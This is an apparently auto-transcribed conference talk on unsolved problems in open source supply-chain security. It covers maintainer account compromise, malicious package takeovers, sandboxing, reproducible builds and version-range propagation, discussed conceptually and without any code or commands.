 Thanks for joining. I'm Maurice Alkins from Widesource. I'm going to talk today about unsolved problems in open source security. One of the reasons why I find open source security to be particularly interesting is that people can often underestimate it. We often talk about the iceberg of modern software. So above the surface, what is most obvious and visible to software developers is the code that they write. But under the surface is the open source code that so many projects depend on. And most measurements put this between 60 to 90% of typical projects. The code that's deployed is actually open source code. So this is a code that helps you run your website or runs the back end of your website. And what this means is that perceptually people might make the mistake of thinking about code that someone else writes being someone else's problem. But the reality is what you ship is your problem. So problems in the open source that you use are your problems. Now, people have had a tendency to try to ignore these problems a little bit. One of my favorite sayings is that the enemy always gets a vote. And what this means is that especially when it comes to open source security, you can choose maybe to try to ignore some of these security problems. But that choice doesn't mean that you won't necessarily get into a fight. And particularly when problems with open source become public, it means that the clock starts ticking. So a problem in a certain library you use, there is a notification about it. And from that point, anybody who has bad intentions can be attempting to find, you know, companies, websites and apps that are using that software and seeing if it is exploitable. So these two factors, the underestimating as well as the public nature of open source security, make them particularly interesting topics. Now, what I want to do today is talk a little bit at first about challenges in open source security that actually are fairly well solved to get a bit of a baseline before moving into some topics which I consider to be, you know, deeply problematic and almost entirely unsolved, which we as an industry need to get on top of. The first topic, mostly solved, nothing's ever perfect, is knowing what open source you are using. You think about dependency maturity levels. Now, to some extent, what I've written here corresponds with time, you know, 10 years ago, 5 years ago, things like that. But all of these still exist in projects today. From a lowest maturity point of view, copy, paste, commit. This was perhaps even the traditional way that open source was used. People would publish code, you know, publicly say you're allowed to use it and people would copy it into their project, commit it and use it. Now, next level up is maybe people who have like build scripts that pulls in open source that need to use at build or compile time. We've matured quite a lot since then and really the leading way now is with package managers. This is things like Bundler and Maven and the NPM and so on. And so in these, the package manifest becomes the kind of key to how we define what open source is used in projects. The final level of maturity which has become more popular in recent years is to use lock files. We're kind of merely saying what direct dependencies we use. Lock files enable us to essentially freeze all direct and indirect dependencies, sometimes known as transitive, so that you can have a kind of repeatable open source build at least where you get the same dependencies installed every time. So this is the kind of like maturity levels we have in terms of open source dependency use. So then if you're looking at how do we detect what open source is used in a project. So the first one I call like a kind of face value. So this is where you would use some tools, script, you know, service from a vendor and you would look for package manifest files or lock files. You pass them and then essentially you know what your project should be using. So this is essentially like looking at what the ingredients are on a can of soup. It tells you what should be in there. In many cases this is sufficient. So you know the ideal is we have a lock file for a repeatable build and we can use the lock file to determine exactly what is in our project. So this is the ideal scenario. Now for a lot of projects or companies though face value is not good enough and so the second approach I call like the forensic approach is you know you say run your build scripts fingerprint every file in the build and post build directories. So pull in all the files that you're using through all the various you know processes and routines and then compare all those files to known open source files. So this is the forensic approach. These are the two approaches we have to determining you know what open source we have in our projects and it's really the fundamental building block because if we don't know what's in our project we can't know whether we have problems or not. There's an old saying about people not wanting to know how the sausage is made. Well if you're in the business of making sausages you need to know how it's made. So if you make software that uses open source you need to know what open source is in your project. Like I said this is a mostly solved problem but it's the base building block for everything else I'm going to talk about today. The second mostly solved problem is being alerted when your open source has problems. So once you know what's in the second step is being alerted that there actually is a problem. Automation here is really essential. If you rely upon manual processes to check if you have open source security problems they're going to be you know forgotten at times and maybe even through bad luck. The most critical problem is going to come just after you did your last check and it's too long until your next check. So the ideal system or service for open source security for vulnerabilities it knows what you're using. So these continuous scans based upon a pipeline approach to always know what is the latest open source that's in your code or at least what's the open source that's in your latest code. This service also knows what's vulnerable. So it has some type of real time feed or scraping from the vulnerability databases. And importantly it correlates the two at all times. So this is really the modern approach to open source security. If you're in the software world you've probably already received your first vulnerability notification from one or more sources. So here we have we know what we're using and then we have a confidence that we will be alerted. So these are problems that are pretty well solved so far. Obviously different degrees depending upon which software you use. But overall as an industry this is a topic that we are fairly on top of. Once we know we have a problem we then want to remediate it and again mostly solved. So remediating open source vulnerabilities. Here's the good news. 85% of the time at least in 2019 when at White Source we did our last check 85% of the time when vulnerabilities or CVDs as you may know them were disclosed publicly in NVD there was already a fixed version available. So that makes your job fairly simple. There is a problem and the resolution is to update the version to a version that doesn't have the problem. So publicly disclosed vulnerabilities are usually the most serious because they're the ones where anybody with malicious intent can be attempting to exploit those. Most like I said have a fixed already available at time of publication. So remediation has become increasingly simple for these scenarios. It means upgrade. So now let's get into the unsolved problems in open source. And I'm going to call identity and reputation as one of the big unsolved problems. There are of course attempts at it. There are opinions on it. But realistically this is not something that as an industry we've really figured out the answer to. So first of all it's really important to understand the difference between two different types of problems. So one is a vulnerable packages and the second is malicious packages. So for vulnerabilities your typical vulnerability. This is an accident or an oversight. So someone has made a mistake essentially. And these are hopefully not easily exploitable. This is the type of vulnerability where somebody says if an attacker can submit a specially crafted string they may be able to cause an overload, a denial of service or potentially a buffer overflow exploit or something like that. This is really what you call a vulnerability and it accounts for most of what you would be alerted about today. It's important to understand the difference between that and malicious packages. So malicious packages in open source are more like viruses or malware like you might be used to on your computers. So they intentionally do bad things and often they do them immediately. So just like a virus if you've got it it's already too late. So it's very important to understand the difference between these two because malicious packages obviously are the ones that if you have them have the highest risk compared to a vulnerability which may not necessarily be exploitable. So malicious packages they can be really two different types here. So it could truly be a malicious package that is bad from the start. So it's published to a registry, it could be like NPM, it could be Maven Central and things like that. And from the very first day it was published it was intended to be bad. Now this would be pretty impressive if people managed to write a library that was good enough that people would start using it instead of existing alternatives. But B also embedded in malicious code. This is normally not what happens. So the best example of purely malicious packages are what we call typosquadding. So if you have a common package like lodash, L-O-D-A-S-H and somebody attempts to publish L-O-W-D-A-S-H and hopes that people misspell lodash because they don't know how it's spelled and installed. So the registries have been attempting to address that problem by actually monitoring for typosquadding and removing them. This one is a reasonably easy one for registries to resolve. So the more dangerous ones are like a good package turned bad. And there's three main ways this has happened. The first is maintainer credentials get compromised. So it's a good package by a good maintainer and somebody bad steals that maintainer's credentials for publishing and then publishes a malicious version. The second approach is a new maintainer can take over an existing good package with malicious intent. There are a lot of open source packages in the world where the author of the package no longer has time to keep up with it. And so there have been instances where somebody comes along and says, oh hey, I'm using this package and here are some fixes or some extra features and the existing maintainer either offers or is requested to add that person as a new maintainer, sometimes even to take the package over. This is one of the key ways in which malicious packages can get into people's software is where you take a package that's already popular but kind of unmaintained and somebody takes it over. And the third way even though it seems less likely but it has happened is where a package creator was playing a very long game and they basically created a package which was good when they created it with the intention to one day burn it and use it as an exploit. So in terms of identity concepts, when we talk about identity it's basically like who are you and can you prove it. And who are you in some ways is one of the least useful things that we can be asking in open source because you don't need a license to be publishing open source and it's kind of hard to determine whether just knowing who someone is gives you any real surety or safety about whether a package they're currently publishing is going to turn bad or not. Can you prove it or not is a far more useful approach because what that means is that if we can be sure that packages that say they're published by a certain identity are then that allows us to draw some conclusions compared to if we can never be sure it's that person publishing or not. So in terms of identity I think it's important to look at risk and reward. So package compromise, they're mostly predictable. Someone is generally looking to steal credentials and then kind of leverage that to steal more credentials or data. The risks though are quite variable. So if the attack is just one where you steal the credentials or someone's reused a password or something of an existing maintainer you've got very little to lose. So if you've stolen someone's credentials and you publish a malicious package pretty much the worst thing that's going to happen is that those credentials will get rotated and you can no longer publish malicious packages using them. So someone here has a lot to gain and very little to lose. A malicious maintainer though is going to lose their account. So if someone is like a long-term publisher of packages has many packages it's very likely that if they actually turned out to be using their packages for bad then they would probably lose the ability to publish packages or at least the industry would stop using any packages they publish. So focusing on two-factor authentication is by far the low-hanging fruit here because if we can remove that vector of stolen credentials then we've really removed the highest gain-for-risk ratio there of just stealing someone's credentials. Two-factor authentication challenges though. One of those is that we have so many transitive dependencies and projects. JavaScript is most well-known but it's not the only one. No matter what the language is you're likely to have a lot of transitive dependencies. So even potentially in a large project you could have hundreds or thousands of total dependencies installed and really when it comes to trying to steal credentials like checking the operating system or environment for credentials only one of those packages needs to be compromised so you're only as strong as your weakest link. The second challenge with two-factor authentication is publishing automation. So a trend is to automate the publishing of new releases instead of having people prepare them manually. But this itself kind of runs counter to the desire to have two-factor authentication because automated systems essentially can't fill in two-factor authentication because it's not intended that way. So for example just this month MPM released a new type of token called an authentication token. So you know you can create a token that is read only which is or allows publication with two-factor authentication or the middle one is automation. So essentially this is a way in which you can take a two-factor authentication account and disable two-factor authentication for the purposes of publishing. Now of course hopefully there is some trade-off there because it'll mean that there's a lot of accounts that have two-factor authentication disabled today which will now be able to enable that in general because they're able to disable it specifically just for the token that they use for publishing. However it still has the problem that if that token is leaked then an attack will be able to publish it with it as well. It is a solvable problem. So for example if you look Google maintains a lot of open source projects and they wish to automate as much as possible makes sense. So they've come up with essentially like a service where you can use two-factor authentication kind of with automation where it's like a two-step process of automatically publishing to what they call Wombat Dressing Room and then having a human fill out the two-factor authentication to the final publishing to MPM. They've also taken a number of steps to try to reduce the chances of exploiting. This is something that we need to work towards where we can combine two-factor authentication with publishing but frankly it mostly requires the work of registries in order to provide a more convenient workflow for publishing. So now the next unsolved problem is malicious maintainers of open source software. If you look at a malicious package creator, this is a special kind of scenario but this is someone that develops a package with the intent to compromise it. This requires pretty high skill because you can't just create any old package and people use it. It takes quite a lot of skill to come up with something that people have a use for and will find and install. It also requires long-term planning. Surprisingly though this has happened. Although you may not be surprised to hear it happened because of Bitcoin but one person did actually quite cleverly really. They created a library, a JavaScript library which they knew would save time from people building cryptocurrency wallets and sure enough at least one cryptocurrency wallet adopted that library to save themselves time and had it as part of their production software and then the same original author who had created the package eventually added in code that would attempt to extract enough information from people running the wallet that they would be able to essentially steal the cryptocurrency. The headline here is of success that was a plot that was foiled. The reality was that people still did lose cryptocurrency so this was somewhat of a successful attack. So this is a pretty tough one because here we have someone that like I said is willing to play the long game. The second approach we have of malicious I call it malicious package maintainers now so this person didn't really create the package but they're a maintainer. The scenario here is someone contributes to an existing and ideally un-maintained package. For example it could be that package that the creator no longer uses themselves but lots of people still do. The second step is once you've contributed get added as a maintainer and the third step is add the exploit to the package. So again this is another one that's happened. These types of things have happened in multiple languages I should say not just JavaScript but it's easy to reference JavaScript here because some of these were very high profile. So this was a scenario where someone created a package maybe like 10 years ago called EventStream and it became a very popular package but the creator of it hadn't used it for years and didn't really have too much time or motive to be maintaining it and eventually someone came along and fixed a bug or two the original creator of the package was very happy to let that person take over as maintainer. Once they'd taken over soon after they added in code to perform exploiting to attempt to you know steal credentials and essentially a lot of people that were running this package were at risk from this. So this is another attack vector in open source where a package that you know was good becomes bad. This takes in a way less work less skill versus creating a package from the very start and why the challenge is also that it means that even if you pick your packages carefully at the time of deciding what to use things can change later down the track. Now let's talk a little bit about what I call security multipliers. Three questions here. Why can malicious packages do so much harm once they're installed? Second part, why are these exploits hard to detect? Why aren't we better at protecting them? And third part is why do exploits propagate so fast? So in a way these are the answers to all this come under this category of unsolved security problems in open source. Alright so unsolved sandboxing permissions. Okay so ideally open source packages should have less permissions by default. You're taking code that someone you don't know wrote but soon as it is loaded and in fact in some ecosystems potentially as soon as it is installed just installing it is enough that it could completely exploit your system. So just like say accidentally running a virus EXE in Windows just merely installing an NPM package can be enough that you are completely exploited. It does vary a bit language by language but pretty much in every language packages can fully exploit a system once they are loaded. Now what is interesting about this is that very few packages actually need the ability to read from the file system or read from the environment or to connect to outside servers but that's basically how every exploit so far has worked. You know they scan for something they shouldn't have access to it could be you know keys and secrets on the local file system and then they send them somewhere else to a remote server. The reality is very few packages that you would use would have a need to do this normally. So let's take a look at the example of operating system malware like Windows I said. Operating system malware is much less of a problem today than it was before. Why is that? So the answer is not that McAfee got better at virus scanning. Like it wasn't that we got better at detecting bad apps. The reason why operating system malware is so much less of a problem today than before is because we changed to more of a zero trust and sandboxing approach when it came to applications. So apps by default when they get permissions which are safe any further permissions you know such as accessing your files accessing your photos and things like that they need explicit approval and the operating system stops them from accessing things they are not approved for. So essentially we didn't solve the problem of malware and operating systems by getting better at detecting malware when it's there or attempting to block it at the instant. We essentially changed the paradigm so that software only uses the permissions that it needs and therefore it makes a lot harder to have an app and the app wants to access all your stuff versus before where it had like default full access and we need to take kind of inspiration from that with open source software as well. I want to highlight a really interesting one. So there is a new project called Dino. Its motto is secure by default. Dino by the way is created by the original creator of Node.js and so with Dino he has an approach where both your application that you write as well as modules you import need to be granted permissions. For example if you take the five line example from Dino of creating a server here if you were just to run that you would get a permission exception. So in this case attempting to access a network is denied because the software was run without the dash dash allowed dash net flag. This is a really big difference to Node.js and pretty much every other language because the idea is that it is secure by default that if you want network access it must be specified. So if you look at the packages which have been used to exploit credentials and then exfiltrate them off to other systems they have all used permissions which they would normally have no need to use. So next problem, detecting malicious updates. So again consider this unsolved because so far we haven't really had any answers to when a package goes from good to bad how could we actually stop that before it gets into people's systems. Here's why malicious updates are missed. I mean the update where it goes from being totally harmless to being harmful. So first of all we have too much open source code to review. It's too hard to review it even when we want to and you can't actually be sure of what you're reviewing. Anyway let's dig into these three points. So open source too much to review. The majority of software projects, your projects, you and me don't have the time to carefully review every line of every piece of open source that we use. This is pretty obvious to most people. Yet as an industry we seem driven by the assumption that surely someone has looked at it. So even though we know it's impractical for us to look at it we kind of assume that surely someone must have. And this really is a fallacy. There is a saying from Linux, given enough eyeballs all bugs are shallow. But we really have to ask the question, are the eyeballs even looking at the releases? So the reality is that the majority of open source releases are probably not looked at by anybody except the person who wrote it. So what are our possibilities here? So one is that there is a business opportunity here for security as a service. Maybe there is a company and they will review every line of code before you update. The second opportunity, maybe more of an industry based one, is crowd security. How is there a way that if someone has reviewed it we can know about it and if nobody has we can also know about that. And the second challenge is kind of like back to identity though of who do you trust. Because if there is someone who is clever enough to take over a package or create a package and publish it probably clever enough to have a few other accounts claimed to have reviewed it. There is no kind of easy answer here to this challenge of we have too much to review. So let's say we are reviewing. We are reviewing an open source update version 1 to version 1.1. It's actually very inconvenient to review today. So the main reason is that source control platforms are designed for reviewing your code not someone else's code that you imported. With the use of package managers and package manifest if you have a pull request that says update dependency from 1.0.0 to 1.1.0 that can literally just be a one line diff. That's not really telling you anything about what actually changed. So reviewing what actually changed typically requires going into some other system like going to maybe central that type of stuff. So leaving your code review and going somewhere else. And unfortunately no major open source registry supports native diffing of packages. So you go there and you say okay I want to know what changed from 1.0.0 to 1.1.0 most of them don't have any like native diffing built in. And further compounding the problem and maybe partly why they don't have a diff is that for many languages what the registries contain is like artifacts. It's built code, post-built code. So it might be like jar files or even in an interpreted language like JavaScript. It can be compiled by Babel or TypeScript to JavaScript. So let's say though that you do actually take the time to review. You do look up where it is and then you want to go and look at the source code. So the problem is that the source you're looking at may not be the real source for the registry artifact that you're consuming. So faced with the challenge of trying to compare post-compiled code you might go and say well it's fine I'll look at the source code that makes sense. That's what I'm interested in. So the good news is that most source code today for open sources on GitHub. So that's one nice thing. We don't have to go hunting too far. The bad news is that a malicious maintainer is most likely not going to put the malicious part of their code on GitHub anyway. With the exception of Docker Hub where there is an option to do like what's called an auto build where you give it a Docker file and it builds the package. No major registries like NPM and piping and things like that. No major registry enforces or verifies the link between source and artifact. So this means that as a malicious maintainer and we've already established that I'm perhaps pretty clever I can publish one thing to GitHub and another thing to the registry. There's no way that the registry identifies that or flags that to somebody that the source doesn't match the artifact because actually none of these registries verify that it does. So this is a huge problem because even if you had like that you had the time to consider this to be a high enough risk it's very, very hard to actually know what it is you should be looking at. So if your whole purpose is looking at code to worry about malicious code unfortunately it's not really going to help to look on GitHub. There is one movement in the industry that I think is fantastic that is most of the solution to this problem and it's called reproducible builds. The idea of reproducible builds is ensuring the verifiability of source code. This is a very big missing link in open source security. What's interesting it doesn't really require extra work at least once it is finished and it greatly decreases security risk for all involved including open source developers. So the idea of reproducible builds is that if you take the source code for a package or for an application that you can build it yourself and verify byte for byte that it is the exact same artifact or post build result as what the publisher says that it is. Now this actually is great for security for even more reasons than you think. So first of all it allows you or allows registries for example to verify that a package matches. Now today if you were taking a package that is on NPM or on Maven Central and you go to its source and you build it yourself and it doesn't match the exact byte for byte what is on the registry that really is not that much of an indication that something is wrong. Unfortunately that is actually how a lot of them work and so what that means is that you can't reliably use a mismatched artifact and source code to identify or to kind of gauge the probability that something is wrong. So the idea of having reproducible builds is that then when a library and application is published that if it is not reproducible you know if it went from being reproducible to non-reproducible it's a big red flag and so for example you might even you know block it. Now one of the other really good benefits of reproducible builds is that it makes all of us safer essentially. So if you think of me being say now a package author and I publish that to a registry and then you consume it attacker could potentially try to exploit both the registry or myself in this scenario. They could also try to say exploit Github or AWS or something if I'm using that to do my builds. Because if they can exploit my system or the system I build on or the system that it's hosted on any of those essentially will work in that the attacker has managed to put code they want to put into the software which others will consume. And what it also means is that if I'm a popular open source author I have a popular package it puts a target on my back because if somebody can hack me they can then potentially use that to hack more important people and projects that used my software. So in a world of reproducible builds where if the source code does not match the published code and that is flagged that means that the incentive for someone to go along and hack me is greatly diminished because they would have to put the malicious code on to Github for example. So this is a really great thing and if you think it sounds great too I recommend that you put that into Google and check that group out. I'm calling this one undecided rather than unsolved decentralized versus centralized registries. Alright so I bring this up because often when people think about community and open source the idea of having fully decentralized sort of like democratic package publishing is generally thought of as pretty good versus having companies that control the registries they control the commons. So for example with NPM the company was running NPM the registry there certainly was the potential for conflicts of interest there because they needed to be profitable. People then have an instinct to think that decentralizing is the answer it's important to understand that with all other things being equal a decentralized approach to package management and package publishing makes security much worse. If you look at any of the known malicious packages from the past five years and there's been ones in Python, there's been Ruby, there's been JavaScript pretty much every time in the first articles that write about it they want to talk about how long it took for it to get taken down from the registry. Essentially there's this implied community expectation that those who run the registry will take down a malicious package almost instantly that someone reports it to them and ideally even have processes in place to have caught it and catch it next time. Now all of this takes a lot of money. It needs also centralized power to take that down. A centralized blocking or revoking of packages can't be done if there's no one in control. If you look at direct git-based dependencies that does have some advantages. There's a scenario where instead of say publishing a module to a registry you basically just tag it on GitHub and say to people install it directly off GitHub. The advantage here is that the source is verifiable like I was talking about earlier. So what you see on GitHub is what you download while also you've got the advantage that the most common costs like GitHub, GitLab and BitBucket they are pretty likely to take down malicious code eventually at least once it's reported to them. They're not in the business of hosting malicious code. In general, I think the push and pull between decentralized versus centralized needs to also be thought about in the context of security because a fully decentralized system from a security point of view can be the wild west unless you have some further kind of overlay on top. So back to unsolved problems. Now we have malicious package propagation. What we see on these malicious packages that we've known about in the past like why did they propagate so fast? How did we have hundreds, thousands of people infected by it within hours, for example? So the reason why malicious code propagates so fast pretty much one word is semva, semantic versioning. The way most people use semantic versioning is what it contributes to. So in this sense it's pretty simple and it's a good thing up front. Is it like all releases like x.y.z if they all have the same x, they should be compatible. So 1.0 is compatible with 1.9 and things like that. Now the problem is that the majority of package managers so this is like NPM, Bundler, Maven, etc. they take an optimistic approach to version ranges. And what this means is that if they're given the opportunity like a fresh install, they will always install the latest compatible version that you specify. So again, if you're in the semva world and you say, okay, so I'm installing right now version 1.2.0 but I want to specify my range is 1.2.0 less than 2.0.0 so that I can get the latest compatible version. What this means is that anytime a new releases out whether it's good or bad, there is a chance that you will get it. Now lock files certainly help here because unless lock file changes, what you install won't change. But the reality is lock files need to be frequently unlocked. So at any time where you need to install something new or update something within the lock file, other packages can be implicitly kind of upgraded. So lock file is not the answer here unless you actually never ever update which is also not really feasible. So if you take an example here with semva so let's say your code depends upon a package called red version 1.0.0 you've got one dependency, you've given the exact version and it seems pretty locked down. But see red might depend upon a dependency called blue 2.x and blue can depend upon a dependency orange 3.x. So without you changing your dependencies you could still be using red 1.0.0 but without you changing your dependencies a new Melissa's version of orange could be installed. Additionally, let's say that you start a new project a new package and you go and you install red 1.0.0. Now at this point you will get the latest version of orange so you get the malicious version for example. So this is how the combination of semva ranges and transitive dependencies can contribute to people getting informabilities. In most of the cases where people had installed and potentially been exploited by malicious packages in the past they weren't directly using the malicious package at all they were indirectly using it through other packages so it's like orange was the bad package. So my conclusion here is that uncapped version ranges should be considered an anti-pattern from a security point of view. So by uncapped I mean any new version within the range is compatible so you should use it, that's uncapped. You know whatever future 1.x is published it's probably good so use it. So what are the alternatives to uncapped ranges? The first is to cap version ranges. So instead of saying like 1.x or a carrot 1.0.0 instead you would specify what is the upper bound. So greater than or equal 1.0.0 less than equal 1.4.0. What this means is that if version 1.5.0 comes out then you won't automatically take it until you update that range and test it and verify it. But again like two factor authentication earlier the challenge here is you're only as strong as your weakest link and so with all these transitive dependencies you would need for all of the packages in your package tree to support this. So another alternative is to change the algorithm completely and an alternative is called minimal version selection. Go modules essentially pioneered this from my point of view. Now go modules though it actually still relies completely on Semver but early when I said Semver is the problem it's not Semver itself it's more the way that we use Semver. So in go modules first of all there's no need to declare ranges. There's no need to say like 1.x because we already know that compatibility with 1.0.0 should mean compatibility with 1.x so there's no need to explicitly mistake that. Key difference with go modules and minimal version selection is that you don't use any newer version than you need to. So what this means is that installed versions will correspond to the minimum compatible version not the latest compatible version like we've generally done with MPM bundler and so on. Now what this means is that any malicious release is never propagated automatically because if the new release is not the minimum version then it doesn't get automatically selected until someone that depends upon it explicitly says I need that version as the minimum. This is very important because it just means that automatic propagation is essentially stopped in the go modules ecosystem. So in terms of version selection the way forward so one of the ways forward for a more secure open source ecosystem would be to use capped ranges and bump them regularly. Now this is achievable using automation tools but it is noisy from a project point of view so if you're having to continually bump capped ranges as a library author you know 90% of the commits to master branch might be from whatever bot you have doing it. So the other alternative would be to use minimal version selection and then only bump dependencies when necessary. Now what this does mean is that this long-held idea that Semver gives you automatic bug fixes goes away because now you're not going to automatically get the latest versions due to minimal version selection. What it means is that if there are bug fixes that you need from your dependencies or potentially features but if there are bug fixes that you need that you need to explicitly specify the minimum version of that package that people should install when they install your package. So these are really the two possible ways forward. So just wrapping up the key points and takeaways from a unsolved problems in open-source security. So first of all we need better open-source publishing protection. Single-factor authentication is unacceptable. Registries should ideally allow enforcing two-factor authentication for publishing and consumers of open-source should be able to elect to use dependencies which have enforced two-factor authentication only. This means basically simple stealing of credentials and stealing of the pass. What does this need? It needs registry host support. So across the industry, whether it is JavaScript, Java, Python, PHP and so on these registries need to implement this separately. It also does really need consumer pressure. It requires us to sort of make sure that registries and package publishers understand that this is important for the consumption. So just like publishing code with no tests should be considered a code smell. Publishing it without two-factor authentication should be the same thing. Number two, verifiable source code using reproducible builds. So there's no point reviewing code for maliciousness if we're scanning the wrong code to begin with. So again, non-reproducible builds should be considered a code smell like the lack of two-factor authentication is. So what this means is that we should have packages that are published, verifiable, both who publish them as well as what source code they came from. This needs industry support for tooling and the reproducible builds foundation is doing a great job with that. It also needs really the adoption of the reproducibility mindset. I really don't hear many people at all talking about this. This definitely hasn't got industry mindset yet but from a security point of view it's one of the most important things that we can do. Number three, big one, open source dependencies should be sandboxed. So today's approach to malicious open source packages can be compared to Windows 95 pre-malware tsunami. Now unfortunately though there's not really any relief in sight from language ecosystems. This is going to require, at least I think so, pretty big work from each language to support this idea that code that you import into your software should have zero trust by default. Unfortunately this needs large re-architecting of language package imports and again apart from Dino I haven't seen too much pushing for this even though it's such a great idea. And then finally I believe the package managers should implement minimal selection beyond just go modules. So it's really madness, it's our madness that a malicious package release could be installed accidentally essentially seconds after it's published without anybody reviewing it. So the example before somebody publishes a malicious version of orange and you know five seconds later somebody says MPM install red 100 they would have the malicious version of orange already. No one's even reviewed or looked at it or anything. This is not a great idea at all. The faster things propagate the worse it's going to be that in 2020. So minimal version selection should be a configurable option for package ecosystems. I think this is going to take a while. It's not easy and there may be some gremlins lurking in that but more languages beyond go modules need support for this minimal version of selection. So this needs A package manager support and B frankly needs awareness that we are making a trade-off of you know security for convenience. Alright so thank you very much if you've lasted this long I am very thankful and in awe if you had any questions or thoughts about the topics today and you haven't entered them in the chat already please do so now. I'll be hanging around for a while but otherwise you can find me on Twitter GitLab with the handle at Rackens and I would be happy to chat with you about any of these topics. Thanks very much.